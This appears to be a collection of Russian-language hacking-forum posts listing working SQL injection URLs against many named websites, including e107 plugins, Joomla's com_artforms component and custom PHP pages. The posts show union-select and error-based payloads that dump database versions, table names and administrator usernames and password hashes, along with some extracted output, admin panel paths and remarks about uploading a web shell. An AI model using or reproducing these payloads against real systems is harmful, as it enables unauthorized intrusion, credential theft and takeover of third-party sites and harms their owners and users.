pr7 тиц40 http://www.lib.udel.edu/ej/index.php?S=%' and 0 union select 1,unhex(hex(version())),3,4,5,6,7 from mysql.user/* &I=26
veterans-gaming.com PR - 1 Code: http://www.veterans-gaming.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- globalassaultunit.net PR - 1 Code: http://globalassaultunit.net/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- www.clankillas.net PR - 3 Code: http://www.clankillas.net/portal/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- totalgamersnetwork.com PR - 1 Code: http://www.totalgamersnetwork.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- hu.cring.eu PR - 1 Code: http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- Примерно так выдираем хеш и никнейм админа: Code: http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user-- Админка: Code: http://hu.cring.eu/e107_admin/admin.php как залить шелл
http://www.shopland-n.com/town_info.php?id=-149+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7+--+ http://www.appliedartsmag.com/opinions.php?id=-37+union+select+1,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),3,4,5 http://www.creativeniche.ca/candidate_jobs_detail.cfm?jobid=-1304+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),user(),database()),10,11 http://www.thunderbirdmarine.com/email-friend.php?ID=-2987+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ID,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110+from+Users+limit+0,1
Онлаин магазин. PHP: http://www.historicalcenter.ru/etc.php?id=6&idg=420+union+select+1,concat_WS(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* PHP: histcenter@localhost:5.0.45:histcenter Салон красоты да ляпоты =) PHP: http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10/* PHP: admin_vashstile@localhost:5.0.22-log:admin_vashstile Продолжаем копать получаем PHP: http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_WS(0x3a,id,username,uncrypt_pass,email,status),5,6,7,8,9,10+from+users+limit+0,1/* админка тут PHP: http://www.vashstile.ru/admin/ правда акк админа я так и не нашел
http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14+-- 4.0.26-log Uwww64S@localhost udb64 portbld-freebsd4.10 http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,login,pass,email),6,7,8,9,10,11,12,13,14+from+client+limit+1+offset+495--
http://www.magelan.su/news.php?id=1075'+and+1=0+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+Where+table_schema='magelan_base'+--+ ТИЦ : 230
http://www.degreeart.com/newsite/viewpress.php?id=104 union select 1,version(),3,4,5,6-- 1 http://www.farcountrypress.com/details.php?id=214' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77-- 1 http://eurocatwalk.com/photo_details.php?uid=-428 union select 1,2,3,4,5,version(),7,8,9,10-- 1 http://www.gamedogped.com/details.php?id=48212 or 1 group by concat((select concat(username,0x3a,password) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1 http://www.gamepile.com/details.php?id=-21 /*!Union*/ select 1,2,table_name,4,5,6,7,8 from information_schema.`tables`-- 1
tidewaterintergroup.org PR - 5 Code: http://www.tidewaterintergroup.org/e107_plugins/aa_meetings/directory.php?Day_qf=d0s&City_qf=%2522+union+select+null,null,null,concat_ws(0x3a,user_loginname,user_password),null,null,null,null,null,null,null,null,null,null,null,null+from+e107_user+where+user_id=1--+ Code: http://www.tidewaterintergroup.org/e107_admin/admin.php wildcatsclan.net PR - 1 Code: http://www.wildcatsclan.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%201,2,3,4,5,concat_ws(0x3a,user_loginname,user_password),7,8,9,10%20from%20e107_user%20where%20user_admin=1%20limit%200,1 Code: http://www.wildcatsclan.net/e107_admin/admin.php vancouverphoto.net PR - 1 Code: http://www.vancouverphoto.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%201,2,3,4,5,concat_ws(0x3a,user_loginname,user_password),7,8,9,10%20from%20e107_user%20where%20user_admin=1%20limit%200,1 Code: http://www.vancouverphoto.net/e107_admin/admin.php
http://www.ozkulkaro.com.tr/dinamik/urun_grubu.php?urun_id=5+and+1=0+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),1),1),6,7,8,9+from+admin--&menu=61 http://www.academictutorials.com/quiz.asp?id=66+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+msysaccessobjects
Code: http://www.moskva-rabota.ru/index.php?id=-398+union+select+1,2,group_concat(table_name),4+from+information_schema.tables--
http://www.artbukhman.com/payment.php?gal=-2&sub=-64&id=-264%20union%20select%201,version(),3,4,5,6,7%20-- 5.1.47-community-log
joomla tp.by PR 5 Тиц 60 Code: http://www.tp.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 cnko.net PR 2 Тиц 30 Code: http://www.cnko.net/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 tdzemi.ru PR 2 Тиц 30 Code: http://www.tdzemi.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 ef2012.com PR 3 Тиц 10 Code: http://www.ef2012.com/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 calcweb.org PR 5 Code: http://www.calcweb.org/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 forward.by PR 2 Code: http://forward.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 cnko.net PR 2 Тиц 30 Code: http://www.cnko.net/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 rcl.ru PR 4 Тиц 20 Code: http://www.rcl.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 swedstyle.ru Тиц 10 Code: http://www.swedstyle.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 напоминаю,что в джумла админка по умолчанию /administrator
Официальный сайт ФК "ХИМКИ" Code: http://www.fckhimki.ru/modules/content/index.php?current_id=-37+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(%20),database()),10,11,12,13+--+ Database Version: 4.0.27-max-log Database name: fckhimki_new1 User name: [email protected] ================================================== Sigmadesigns.com Code: http://www.sigmadesigns.com/solutions_subcat.php?id=1'+or+1+group+by+concat(mid((select+TABLE_NAME+from+information_schema.tables+where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit+0,1),1,63),floor(rand(0)*2))having+min(0)+--+ Database Version: 5.1.30-community-log Database name: dd04318780 User name: [email protected] ================================================== Worldmusicinstitute.org Code: http://www.worldmusicinstitute.org/sections.php?id=18+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+--+ Database Version: 4.1.25-Debian_mt1-log Database name: worldmusicinstitute_org_-_ucms User name: [email protected] ==================================================
http://cats1004.com/info_list.php?categoryi=-1+union+select+concat_ws(0x3a,database(),user(),version())+-- Database: realty_cats1004 User: realty_cats1004@localhost Version: 4.0.22-log
http://www.spynets.com/cheats/details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--
http://www.theart.ru/cgi-bin/performance.cgi?id=9405'+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,group_concat(table_name),26,27,28,29,30,31,32+from+information_schema.tables+where+table_Schema=0x74686561727472755f6f7264656e+--+ ТИЦ : 325 PR: 4 http://polbileta.ru/cgi-bin/cinema/performance.cgi?id=76+and+1=0+UnIon+selECt+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+From+information_schema.schemata+--+ п.с TreV@N , уверин что половина твоих скуль бoян!
http://www.bheru.com/indianews/?l=4&id=3414+and+1=0+union+select+unhex(hex(concat_ws(0x3a,user_name,password)))+from+admininfo+-- Database: bherudb User: bherudbuser@localhost Version: 5.0.79 Шелл льётся в 2 клика и редактирование соуса паги:3 http://www.nexusarts.com.au/view_performer_details.php?id=61+UnIon+selECt+1,concat_ws(0x3a,user_name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66+from+users+-- Database: nexusprd User: [email protected] Version: 5.0.91-log Жирнючий сайт...Админку найти так и не смог, пароль в хешбазах есть.
premiera-salon.com Тиц 20 Code: http://premiera-salon.com/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 15-sotok.ru PR 2 Code: http://www.15-sotok.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 white-line.ru Тиц 10 PR 1 Code: http://www.white-line.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 www.master-obraza.ru Тиц 10 Code: http://www.master-obraza.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 ies-nn.ru PR 1 Code: http://www.ies-nn.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 pioner-forma.ru Тиц 10 Code: http://www.pioner-forma.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23 12-school.ru PR 1 Code: http://www.12-school.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
